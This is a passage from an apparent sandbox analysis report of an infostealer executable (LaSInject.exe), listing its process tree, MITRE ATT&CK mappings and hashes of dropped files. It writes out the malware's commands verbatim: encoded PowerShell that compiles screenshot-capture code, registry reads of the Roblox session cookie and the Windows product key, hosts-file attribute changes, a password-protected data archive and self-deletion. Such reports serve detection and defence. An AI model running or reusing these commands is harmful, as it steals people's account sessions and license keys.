B0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3460
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\atsen3yf\atsen3yf.cmdline"
        5⤵
        
        PID:3976
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81D2.tmp" "c:\Users\Admin\AppData\Local\Temp\atsen3yf\CSC373E6B9944D04DA292908682F6239BB2.TMP"
        6⤵
        
        PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3136
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2900
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5116
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4908
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1208
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4464
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:364
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4404
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18522\rar.exe a -r -hp"ELCOJO" "C:\Users\Admin\AppData\Local\Temp\WJ8sL.zip" *"
    3⤵
    PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\_MEI18522\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI18522\rar.exe a -r -hp"ELCOJO" "C:\Users\Admin\AppData\Local\Temp\WJ8sL.zip" *
      4⤵
      Executes dropped EXE
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4048
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a9293ef980c925abe33d940554ed8575

SHA1
9b6d85f2595f7fd4923f52b21ab7607279066969

SHA256
8313a191aa9d11cce868d95ac9a9b1609275bfe93131fcb6e547b985b0242fbe

SHA512
2003d90bb2bc89378ccaeb9c5edf76b2dfd93c80369d063e56141abb8d7fea6acee6a103874ab227bc1548437269c8e4ee5174bf482ecf3d66c38f3e0ba35d85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b736b1cf455023520eb7abb7f35ddaa2

SHA1
f3d04d1c5d14eb92c1e466ee4767ea65680b4070

SHA256
3530522d67a50208cbc38ada3fc1ce9c3f858488e1573e2cf1da6748040b8849

SHA512
5bff0ecabba8d72a06456a54911e623e519b4ed78d21e32de94cfae5e21636f46e5134c95abd184b43fec7fd2fd0a12087a330eb3cd41cb5507db4a1996c5158

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES81D2.tmp

Filesize
1KB

MD5
89a21556d0550265c39443af5748042e

SHA1
4080e76716f4eba9dcbe2b7515e8d11aecac8a21

SHA256
0a5963d548e48eb7d9e0761cae66fb8ba9cca6e991d571d88e4c7d750a430f5a

SHA512
e09cf01cfa01e3a0b605e2289423c837634636341629af1557a4cf0d133490f05365b00668277a04da14f92e3a5240c664c5fd07548d6d4fab273e905420b065

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_bz2.pyd

Filesize
48KB

MD5
83b5d1943ac896a785da5343614b16bc

SHA1
9d94b7f374030fed7f6e876434907561a496f5d9

SHA256
bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a

SHA512
5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_ctypes.pyd

Filesize
58KB

MD5
7ecc651b0bcf9b93747a710d67f6c457

SHA1
ebb6dcd3998af9fff869184017f2106d7a9c18f3

SHA256
b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a

SHA512
1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_decimal.pyd

Filesize
106KB

MD5
0cfe09615338c6450ac48dd386f545fd

SHA1
61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe

SHA256
a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3

SHA512
42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_hashlib.pyd

Filesize
35KB

MD5
7edb6c172c0e44913e166abb50e6fba6

SHA1
3f8c7d0ff8981d49843372572f93a6923f61e8ed

SHA256
258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531

SHA512
2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_lzma.pyd

Filesize
85KB

MD5
71f0b9f90aa4bb5e605df0ea58673578

SHA1
c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e

SHA256
d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535

SHA512
fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_queue.pyd

Filesize
25KB

MD5
f1e7c157b687c7e041deadd112d61316

SHA1
2a7445173518a342d2e39b19825cf3e3c839a5fe

SHA256
d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339

SHA512
982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_socket.pyd

Filesize
43KB

MD5
57dc6a74a8f2faaca1ba5d330d7c8b4b

SHA1
905d90741342ac566b02808ad0f69e552bb08930

SHA256
5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca

SHA512
5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_sqlite3.pyd

Filesize
56KB

MD5
72a0715cb59c5a84a9d232c95f45bf57

SHA1
3ed02aa8c18f793e7d16cc476348c10ce259feb7

SHA256
d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad

SHA512
73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\_ssl.pyd

Filesize
62KB

MD5
8f94142c7b4015e780011c1b883a2b2f

SHA1
c9c3c1277cca1e8fe8db366ca0ecb4a264048f05

SHA256
8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c

SHA512
7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\base_library.zip

Filesize
1.4MB

MD5
1c9a020e8bfc99a77f51c7d5ceb937f1

SHA1
9b2c6f0c4d16ac0b69e5232648b6e6c5df39cd9c

SHA256
2ce10a77f29612f9afd3fb21baaf38162fdc484174aec051a32eeaef28ce8b37

SHA512
98312712c4be133d979b9699e661c451cd8c27ae4c5abc295c359fd857d20b3fde55e6555bdd2230d580903bb230798fba2c72381b263327f5d0820d28ddfbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\blank.aes

Filesize
126KB

MD5
3aeef194e5490730bdfed13125376953

SHA1
70fdb894240dffd77872359b34faf002411ab9f6

SHA256
f84b59046bbf8a4a58489fc86baa0cda445e949aebfe28c47e3b8d0920f3620e

SHA512
cba3b3c27bde9f8bb9108fae83efb62c0d1249a766a6b0465e3d4574949bebe89e08f0ad2fa1d4bc6fe12b235dc947f6701b78f8bc0032609320c9cbdc1d4f80

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\libcrypto-1_1.dll

Filesize
1.1MB

MD5
e5aecaf59c67d6dd7c7979dfb49ed3b0

SHA1
b0a292065e1b3875f015277b90d183b875451450

SHA256
9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1

SHA512
145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\libffi-8.dll

Filesize
27KB

MD5
87786718f8c46d4b870f46bcb9df7499

SHA1
a63098aabe72a3ed58def0b59f5671f2fd58650b

SHA256
1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33

SHA512
3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\libssl-1_1.dll

Filesize
203KB

MD5
7bcb0f97635b91097398fd1b7410b3bc

SHA1
7d4fc6b820c465d46f934a5610bc215263ee6d3e

SHA256
abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e

SHA512
835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\python311.dll

Filesize
1.6MB

MD5
1e76961ca11f929e4213fca8272d0194

SHA1
e52763b7ba970c3b14554065f8c2404112f53596

SHA256
8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0

SHA512
ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18522\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
